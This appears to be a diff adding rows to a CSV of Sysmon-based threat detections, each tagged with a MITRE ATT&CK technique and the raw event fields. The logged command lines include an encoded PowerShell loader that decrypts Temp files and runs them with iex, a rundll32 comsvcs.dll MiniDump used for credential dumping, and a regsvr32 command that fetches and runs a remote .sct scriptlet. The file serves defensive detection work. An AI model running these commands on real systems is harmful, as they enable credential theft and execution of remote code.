+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:08.331
+ 747F3D96-1C70-5D69-0000-0010C9661F00
+ 2888
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-1C70-5D69-0000-0010D4551F00
+ 1144
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:08.331
+ 747F3D96-1C70-5D69-0000-0010C9661F00
+ 2888
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-1C70-5D69-0000-0010D4551F00
+ 1144
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:08.331
+ 747F3D96-1C70-5D69-0000-0010C9661F00
+ 2888
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-1C70-5D69-0000-0010D4551F00
+ 1144
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:08.331
+ 747F3D96-1C70-5D69-0000-0010C9661F00
+ 2888
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-1C70-5D69-0000-0010D4551F00
+ 1144
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 32154
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-30 12:54:08.331
+ 747F3D96-1C70-5D69-0000-0010C9661F00
+ 2888
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1B6A-5D69-0000-0020E5810E00
+ 0xe81e5
+ 1
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-1C70-5D69-0000-0010D4551F00
+ 1144
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
+
+
+
+
+ 8
+ 2
+ 4
+ 8
+ 0
+ 0x8000000000000000
+
+
+ 5227
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DESKTOP-PIU87N6
+
+
+
+
+
+ 2020-09-28 12:47:36.204
+ BC47D85C-DB68-5F71-0000-0010B237AB01
+ 3352
+ C:\Windows\System32\rdrleakdiag.exe
+ BC47D85C-FAA9-5F68-0000-0010D9590000
+ 668
+ C:\Windows\System32\lsass.exe
+ 3468
+ 0x00007FF8C72C5EC0
+ C:\WINDOWS\SYSTEM32\ntdll.dll
+
+
+",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5883
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.150
+ 365ABB72-3D6D-5CEB-0000-00101760FF00
+ 2104
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 24
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1033,technique_name=System Owner/User Discovery
+ 2019-04-18 17:00:09.677
+ 365ABB72-AD19-5CB8-0000-0010F4F40C00
+ 3980
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ Powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 24
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1033,technique_name=System Owner/User Discovery
+ 2019-04-18 17:00:09.677
+ 365ABB72-AD19-5CB8-0000-0010F4F40C00
+ 3980
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-AB27-5CB8-0000-002021CA0000
+ 0xca21
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ Powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17287
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-13 18:03:19.497
+ 365ABB72-B167-5CD9-0000-001062160C00
+ 2476
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-B0EC-5CD9-0000-00201D340100
+ 0x1341d
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-B0EC-5CD9-0000-0010D9D20000
+ 944
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17287
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-13 18:03:19.497
+ 365ABB72-B167-5CD9-0000-001062160C00
+ 2476
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-B0EC-5CD9-0000-00201D340100
+ 0x1341d
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-B0EC-5CD9-0000-0010D9D20000
+ 944
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17287
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-13 18:03:19.497
+ 365ABB72-B167-5CD9-0000-001062160C00
+ 2476
+ C:\Windows\System32\regsvr32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-B0EC-5CD9-0000-00201D340100
+ 0x1341d
+ 1
+ Medium
+ SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583
+ 365ABB72-B0EC-5CD9-0000-0010D9D20000
+ 944
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5275
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 20:18:09.593
+ 365ABB72-AB81-5C8E-0000-00102E9E0C00
+ 3892
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
+ C:\Windows\system32\
+ PC04\IEUser
+ 365ABB72-A960-5C8E-0000-002004C00300
+ 0x3c004
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-173D-5C8F-0000-00102A6A0000
+ 608
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5275
+
+
+
+
